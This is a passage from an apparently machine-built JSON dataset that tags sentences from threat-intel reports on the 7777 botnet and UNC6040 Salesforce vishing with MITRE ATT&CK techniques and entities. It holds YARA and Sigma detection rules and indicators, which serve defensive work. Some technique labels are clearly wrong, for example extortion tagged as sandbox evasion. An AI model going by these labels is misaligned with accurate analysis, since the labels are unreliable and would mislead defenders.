\"-k : password\" $ = \"d : backgroud\" condition:\nuint32be(0)", "sentence_text": "== 0x7f454c46 and filesize < 150KB and 5 of them } rule tool_microsocks_strings { meta:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Uses microsocks proxy tool for SOCKS5 tunneling", "entities": [ { "text": "microsocks", "start": 64, "end": 74, "label": "MalwareTool" }, { "text": " filesize < 150KB and 5 of them ", "start": 17, "end": 52, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s147-573aaf", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 147, "context_before": "== 0x7f454c46 and filesize < 150KB and 5 of them } rule tool_microsocks_strings { meta:", "sentence_text": "id = \"07cdecee-3a62-4e1d-96cd-24e4dc30925d\" version = \"1.0\" tool = \"microsocks\" description = \"Detects the microsocks project developed by rofl0r\" source = \"Sekoia.io\" creation_date = \"2024-07-18\" classification = \"TLP:CLEAR\" hash = \"c8e229bed1659f1613c1016b3345ef08\" strings:\n$ = \"error: user and pass must be used together\" $ = \": option requires an argument:\" $ = \"option -1 activates auth_once mode:\" $ = \"error: option -%c requires an operan\" $ = \"client[%d] %s: connected to %s:%d\" condition:\nuint32be(0)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Uses microsocks proxy with authentication and connection logging", "entities": [ { "text": "microsocks", "start": 68, "end": 78, "label": "MalwareTool" }, { "text": "c8e229bed1659f1613c1016b3345ef08", "start": 234, "end": 266, "label": "Infrastructure_Indicator" }, { "text": "error: user and pass must be used together", "start": 282, "end": 324, "label": "Infrastructure_Indicator" }, { "text": "option requires an argument:", "start": 333, "end": 361, "label": "Infrastructure_Indicator" }, { "text": "error: option -%c requires an operan", "start": 410, "end": 446, "label": "Infrastructure_Indicator" }, { "text": "client[%d] %s: connected to %s:%d", "start": 453, "end": 486, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s148-a6bc72", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 148, "context_before": "id = \"07cdecee-3a62-4e1d-96cd-24e4dc30925d\" version = \"1.0\" tool = \"microsocks\" description = \"Detects the microsocks project developed by rofl0r\" source = \"Sekoia.io\" creation_date = \"2024-07-18\" classification = \"TLP:CLEAR\" hash = \"c8e229bed1659f1613c1016b3345ef08\" strings:\n$ = \"error: user and pass must be used together\" $ = \": option requires an argument:\" $ = \"option -1 activates auth_once mode:\" $ = \"error: option -%c requires an operan\" $ = \"client[%d] %s: connected to %s:%d\" condition:\nuint32be(0)", "sentence_text": "== 0x7f454c46 and filesize < 100KB and 4 of them } Sigma rule title: Entra ID Account Password Compromised By 7777 Botnet description: Detects a successful Entra ID authentication featuring characteristics associated with the 7777 botnet.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Compromises Entra ID accounts via password spraying with unique signatures", "entities": [ { "text": "Entra ID", "start": 72, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "7777 Botnet", "start": 113, "end": 124, "label": "ThreatActor" }, { "text": "successful Entra ID authentication", "start": 148, "end": 182, "label": "Action" } ] }, { "uid": "mitre-98_mitre_report-p1-s149-35dda4", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 149, "context_before": "== 0x7f454c46 and filesize < 100KB and 4 of them } Sigma rule title: Entra ID Account Password Compromised By 7777 Botnet description: Detects a successful Entra ID authentication featuring characteristics associated with the 7777 botnet.", "sentence_text": "author: Sekoia.io\ndate: 2024/07/19\ntags:\n- tlp.clear\nlogsource:\nproduct: azure\nservice: signinlogs\ndetection:\nselection:\nuserAgent:\n- 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36' AppId: 1950a258-227b-4e31-a9cf-717495945fc2 # Microsoft Azure PowerShell ResourceId: 00000003-0000-0000-c000-000000000000 # Microsoft Graph filter:", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Uses specific User-Agents and Azure PowerShell AppId for credential attacks", "entities": [ { "text": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", "start": 135, "end": 204, "label": "Infrastructure_Indicator" }, { "text": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36", "start": 209, "end": 324, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Graph ", "start": 450, "end": 466, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Azure PowerShell ", "start": 372, "end": 399, "label": "Infrastructure_Indicator" }, { "text": "ResourceId: 00000003-0000-0000-c000-000000000000 ", "start": 399, "end": 448, "label": "Infrastructure_Indicator" }, { "text": "AppId: 1950a258-227b-4e31-a9cf-717495945fc2", "start": 326, "end": 369, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s150-02da27", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 150, "context_before": "author: Sekoia.io\ndate: 2024/07/19\ntags:\n- tlp.clear\nlogsource:\nproduct: azure\nservice: signinlogs\ndetection:\nselection:\nuserAgent:\n- 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36' AppId: 1950a258-227b-4e31-a9cf-717495945fc2 # Microsoft Azure PowerShell ResourceId: 00000003-0000-0000-c000-000000000000 # Microsoft Graph filter:", "sentence_text": "ResultType:\n- 50126 # InvalidUserNameOrPassword - 50053 # IdsLocked - 50057 # UserDisabled - 50056 # InvalidPasswordNullPassword condition: selection and not filter falsepositives:\n- Other error codes indicating that the password was incorrect.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110.003", "name": "Password Spraying" } ], "procedure": "Generates specific authentication error codes during password spraying", "entities": [ { "text": "50126 # InvalidUserNameOrPassword", "start": 14, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "50053 # IdsLocked", "start": 50, "end": 67, "label": "Infrastructure_Indicator" }, { "text": "50057 # UserDisabled", "start": 70, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "50056 # InvalidPasswordNullPassword ", "start": 93, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-98_mitre_report-p1-s151-f293f2", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 151, "context_before": "ResultType:\n- 50126 # InvalidUserNameOrPassword - 50053 # IdsLocked - 50057 # UserDisabled - 50056 # InvalidPasswordNullPassword condition: selection and not filter falsepositives:\n- Other error codes indicating that the password was incorrect.", "sentence_text": "level: high\nNotes:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s152-997efa", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 152, "context_before": "level: high\nNotes:", "sentence_text": "A similar rule can be written for the Microsoft 365 audit log.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s153-431096", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 153, "context_before": "A similar rule can be written for the Microsoft 365 audit log.", "sentence_text": "Greetings\nWe would like to thank Intrinsec for putting us on the trail of this botnet and Gi7w0rm for its publication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s154-de196b", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 154, "context_before": "Greetings\nWe would like to thank Intrinsec for putting us on the trail of this botnet and Gi7w0rm for its publication.", "sentence_text": "Thanks to Nicolas Noël (Disweb.fr), who allowed us to intervene on one of his client’s routers, as well as to everyone who, directly or indirectly, contributed to the successful completion of this operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s155-692441", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 155, "context_before": "Thanks to Nicolas Noël (Disweb.fr), who allowed us to intervene on one of his client’s routers, as well as to everyone who, directly or indirectly, contributed to the successful completion of this operation.", "sentence_text": "A glimpse into the Quad7 operators’ next moves and associated botnets Raspberry Robin’s botnet second life APT28 leverages multiple phishing techniques to target Ukrainian civil society Log4Shell: the defender’s worst nightmare ?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s156-ca0e30", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 156, "context_before": "A glimpse into the Quad7 operators’ next moves and associated botnets Raspberry Robin’s botnet second life APT28 leverages multiple phishing techniques to target Ukrainian civil society Log4Shell: the defender’s worst nightmare ?", "sentence_text": "Share\n7777 botnet\nBotnet\nCTI\nMalware\nQuad7 botnet\nShare this post:\nWhat's next\nEmulating and Detecting Scattered Spider-like Attacks Written by Mitigant (Kennedy Torkura) and Sekoia.io Threat Detection and Research (TDR) team (Erwan Chevalier and Guillaume Couchard).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s157-d2c8ac", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 157, "context_before": "Share\n7777 botnet\nBotnet\nCTI\nMalware\nQuad7 botnet\nShare this post:\nWhat's next\nEmulating and Detecting Scattered Spider-like Attacks Written by Mitigant (Kennedy Torkura) and Sekoia.io Threat Detection and Research (TDR) team (Erwan Chevalier and Guillaume Couchard).", "sentence_text": "This blog post is the second in a series of two on the Quad7 botnet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s158-42a9a8", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 158, "context_before": "This blog post is the second in a series of two on the Quad7 botnet.", "sentence_text": "It presents...", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-98_mitre_report-p1-s159-22712a", "source": "mitre", "doc_id": "98_mitre_report", "page_number": 1, "sentence_id": 159, "context_before": "It presents...", "sentence_text": "Trending topics\nDetection\nSOC\nXDR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s1-fb71e4", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The Cost of a Call: From Voice Phishing to Data Extortion | Google Cloud Blog Threat Intelligence The Cost of a Call: From Voice Phishing to Data Extortion June 5, 2025 Google Threat Intelligence Group Google Threat Intelligence Visibility and context on the threats that matter most.\nUpdate (August 8):", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s2-1b6f3f", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "The Cost of a Call: From Voice Phishing to Data Extortion | Google Cloud Blog Threat Intelligence The Cost of a Call: From Voice Phishing to Data Extortion June 5, 2025 Google Threat Intelligence Group Google Threat Intelligence Visibility and context on the threats that matter most.\nUpdate (August 8):", "sentence_text": "Google has completed its email notifications to those affected by this incident.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s4-a5906a", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "Update (August 8):", "sentence_text": "Another update will be posted here once these alerts have been issued.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s6-1c216c", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "Update (August 5)", "sentence_text": "In June, one of Google’s corporate Salesforce instances was impacted by similar UNC6040 activity described in this post.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "Impacts corporate Salesforce instances via UNC6040 activity", "entities": [ { "text": "Google’s corporate Salesforce instances ", "start": 16, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "UNC6040 ", "start": 80, "end": 88, "label": "ThreatActor" }, { "text": "Google’s corporate Salesforce instances was impacted ", "start": 16, "end": 69, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s7-f78493", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "In June, one of Google’s corporate Salesforce instances was impacted by similar UNC6040 activity described in this post.", "sentence_text": "Google responded to the activity, performed an impact analysis and began mitigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s8-da5ceb", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "Google responded to the activity, performed an impact analysis and began mitigations.", "sentence_text": "The instance was used to store contact information and related notes for small and medium businesses.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Targets Salesforce instance containing SMB contact information and business notes", "entities": [ { "text": "instance", "start": 4, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "store contact information", "start": 25, "end": 50, "label": "Action" }, { "text": "related notes for small and medium businesses.", "start": 55, "end": 101, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s9-05023f", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "The instance was used to store contact information and related notes for small and medium businesses.", "sentence_text": "Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Retrieves data during limited access window before detection", "entities": [ { "text": "threat actor", "start": 49, "end": 61, "label": "ThreatActor" }, { "text": "data was retrieved", "start": 23, "end": 41, "label": "Action" }, { "text": "small window of time before the access was cut off.", "start": 71, "end": 122, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s10-9a89cb", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off.", "sentence_text": "The data retrieved by the threat actor was confined to basic and largely publicly available business information, such as business names and contact details.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "Exfiltrates basic business information and contact details", "entities": [ { "text": "the threat", "start": 22, "end": 32, "label": "ThreatActor" }, { "text": " data retrieved", "start": 3, "end": 18, "label": "Action" }, { "text": " business names and contact details.", "start": 121, "end": 157, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s11-876ef8", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "The data retrieved by the threat actor was confined to basic and largely publicly available business information, such as business names and contact details.", "sentence_text": "The extortion involves calls or emails to employees of the victim organization demanding payment in bitcoin within 72 hours.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1497", "name": "Virtualization/Sandbox Evasion" } ], "procedure": "Conducts extortion via calls/emails demanding bitcoin payment within 72 hours", "entities": [ { "text": "demanding payment in bitcoin within 72 hours.", "start": 79, "end": 124, "label": "Action" }, { "text": "extortion involves calls or emails to employees ", "start": 4, "end": 52, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s12-9875e1", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "The extortion involves calls or emails to employees of the victim organization demanding payment in bitcoin within 72 hours.", "sentence_text": "During these communications, UNC6240 has consistently claimed to be the threat group ShinyHunters.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1584.005", "name": "Botnet" } ], "procedure": "Claims affiliation with ShinyHunters threat group during extortion", "entities": [ { "text": "UNC6240", "start": 29, "end": 36, "label": "ThreatActor" }, { "text": "ShinyHunters.", "start": 85, "end": 98, "label": "ThreatActor" }, { "text": " claimed to be the threat group ", "start": 53, "end": 85, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s13-054178", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "During these communications, UNC6240 has consistently claimed to be the threat group ShinyHunters.", "sentence_text": "In addition, we believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Prepares to escalate extortion by launching data leak site", "entities": [ { "text": "threat actors", "start": 24, "end": 37, "label": "ThreatActor" }, { "text": "ShinyHunters", "start": 49, "end": 61, "label": "ThreatActor" }, { "text": "escalate their extortion tactics", "start": 89, "end": 121, "label": "Action" }, { "text": "data leak site (DLS).", "start": 137, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s14-35d93a", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "In addition, we believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS).", "sentence_text": "These new tactics are likely intended to increase pressure on victims, including those associated with the recent UNC6040 Salesforce-related data breaches.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Escalates extortion pressure via data leak site targeting UNC6040 victims", "entities": [ { "text": "increase pressure on victims", "start": 41, "end": 69, "label": "Action" }, { "text": "UNC6040", "start": 114, "end": 121, "label": "ThreatActor" }, { "text": "Salesforce-related data breaches.", "start": 122, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s15-8a8369", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "These new tactics are likely intended to increase pressure on victims, including those associated with the recent UNC6040 Salesforce-related data breaches.", "sentence_text": "We continue to monitor this actor and will provide updates as appropriate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s16-8bc7ec", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "We continue to monitor this actor and will provide updates as appropriate.", "sentence_text": "UNC6240 Extortion Email Sender Addresses shinycorp@tuta[.]com shinygroup@tuta[.]com UNC6040 (Evolving TTPs)\nGTIG has observed an evolution in UNC6040's TTPs.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1585.002", "name": "Email Accounts" } ], "procedure": "Uses Tuta email addresses for extortion communications and evolves TTPs", "entities": [ { "text": "UNC6240", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " shinycorp@tuta[.]com", "start": 40, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "shinygroup@tuta[.]com", "start": 62, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "UNC6040 ", "start": 84, "end": 92, "label": "ThreatActor" }, { "text": "Evolving TTPs", "start": 93, "end": 106, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s17-a3fbea", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "UNC6240 Extortion Email Sender Addresses shinycorp@tuta[.]com shinygroup@tuta[.]com UNC6040 (Evolving TTPs)\nGTIG has observed an evolution in UNC6040's TTPs.", "sentence_text": "While the group initially relied on the Salesforce Dataloader application, they have since shifted to using custom applications.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Shifts from Salesforce Dataloader to custom applications for data operations", "entities": [ { "text": "shifted to using custom applications.", "start": 91, "end": 128, "label": "Action" }, { "text": "Salesforce Dataloader application", "start": 40, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s18-f46cbd", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "While the group initially relied on the Salesforce Dataloader application, they have since shifted to using custom applications.", "sentence_text": "These custom applications are typically Python scripts that perform a similar function to the Dataloader app.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Develops custom Python scripts to replace Salesforce Dataloader functionality", "entities": [ { "text": "Python scripts", "start": 40, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "Dataloader app.", "start": 94, "end": 109, "label": "Infrastructure_Indicator" }, { "text": " perform a similar function ", "start": 59, "end": 87, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s19-cfc251", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "These custom applications are typically Python scripts that perform a similar function to the Dataloader app.", "sentence_text": "The updated attack chain involves a voice call to enroll a victim, which the threat actor initiates while using Mullvad VPN IPs or TOR.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Initiates voice calls via Mullvad VPN or TOR for victim enrollment", "entities": [ { "text": "voice call to enroll a victim", "start": 36, "end": 65, "label": "Action" }, { "text": "Mullvad VPN IPs ", "start": 112, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "TOR", "start": 131, "end": 134, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s20-55a5e9", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "The updated attack chain involves a voice call to enroll a victim, which the threat actor initiates while using Mullvad VPN IPs or TOR.", "sentence_text": "Following this initial engagement, the data collection is automated and through TOR IPs, a change that further complicates attribution and tracking efforts.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Automates data collection through TOR IPs to complicate attribution", "entities": [ { "text": "data collection is automated", "start": 39, "end": 67, "label": "Action" }, { "text": "TOR IPs", "start": 80, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "complicates attribution and tracking efforts.", "start": 111, "end": 156, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s21-73729f", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Following this initial engagement, the data collection is automated and through TOR IPs, a change that further complicates attribution and tracking efforts.", "sentence_text": "GTIG observed that the threat actor shifted from creating Salesforce trial accounts using webmail emails to using compromised accounts from unrelated organizations to initially register their malicious applications.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Uses compromised organizational accounts to register malicious Salesforce applications", "entities": [ { "text": "shifted from creating Salesforce trial accounts", "start": 36, "end": 83, "label": "Action" }, { "text": "using webmail emails to using compromised accounts from unrelated organizations", "start": 84, "end": 163, "label": "Action" }, { "text": "register their malicious applications.", "start": 177, "end": 215, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s22-c233bd", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "GTIG observed that the threat actor shifted from creating Salesforce trial accounts using webmail emails to using compromised accounts from unrelated organizations to initially register their malicious applications.", "sentence_text": "A Google Threat Intelligence (GTI)\ncollection of related Indicators of Compromise (IOCs) is available.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Maintains collection of IOCs for threat detection", "entities": [ { "text": "Google Threat Intelligence (GTI)", "start": 2, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "Indicators of Compromise (IOCs)", "start": 57, "end": 88, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s23-4d722b", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "A Google Threat Intelligence (GTI)\ncollection of related Indicators of Compromise (IOCs) is available.", "sentence_text": "Introduction\nGoogle Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing)\ncampaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Conducts voice phishing to compromise Salesforce instances for data theft and extortion", "entities": [ { "text": "UNC6040", "start": 65, "end": 72, "label": "ThreatActor" }, { "text": "voice phishing (vishing)\ncampaigns", "start": 133, "end": 167, "label": "Action" }, { "text": "large-scale data theft", "start": 244, "end": 266, "label": "Action" }, { "text": "extortion", "start": 282, "end": 291, "label": "Action" }, { "text": "Salesforce instances ", "start": 219, "end": 240, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s24-abee98", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "Introduction\nGoogle Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing)\ncampaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion.", "sentence_text": "Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Impersonates IT support personnel in telephone social engineering", "entities": [ { "text": "UNC6040", "start": 30, "end": 37, "label": "ThreatActor" }, { "text": "impersonate IT support personnel", "start": 118, "end": 150, "label": "Action" }, { "text": "telephone-based social engineering engagements.", "start": 165, "end": 212, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s25-e2ec53", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements.", "sentence_text": "In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Relies on user manipulation rather than technical exploitation", "entities": [ { "text": "manipulating end users", "start": 43, "end": 65, "label": "Action" }, { "text": "not exploiting any vulnerability", "start": 67, "end": 99, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s26-4ad20a", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce.", "sentence_text": "A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Deceives victims into authorizing malicious Salesforce connected apps", "entities": [ { "text": "UNC6040's ", "start": 22, "end": 32, "label": "ThreatActor" }, { "text": "deceiving victims into authorizing ", "start": 52, "end": 87, "label": "Action" }, { "text": "malicious connected app", "start": 89, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "Salesforce portal.", "start": 137, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s27-3e2343", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal.", "sentence_text": "This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Uses modified unauthorized versions of Salesforce Data Loader", "entities": [ { "text": "Salesforce’s Data Loader", "start": 48, "end": 72, "label": "Infrastructure_Indicator" }, { "text": " modified version", "start": 27, "end": 44, "label": "Action" }, { "text": "not authorized by Salesforce.", "start": 74, "end": 103, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s28-9b8316", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce.", "sentence_text": "During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Guides victims to approve malicious Data Loader app during vishing calls", "entities": [ { "text": "guides the victim to visit Salesforce's connected app setup page", "start": 33, "end": 97, 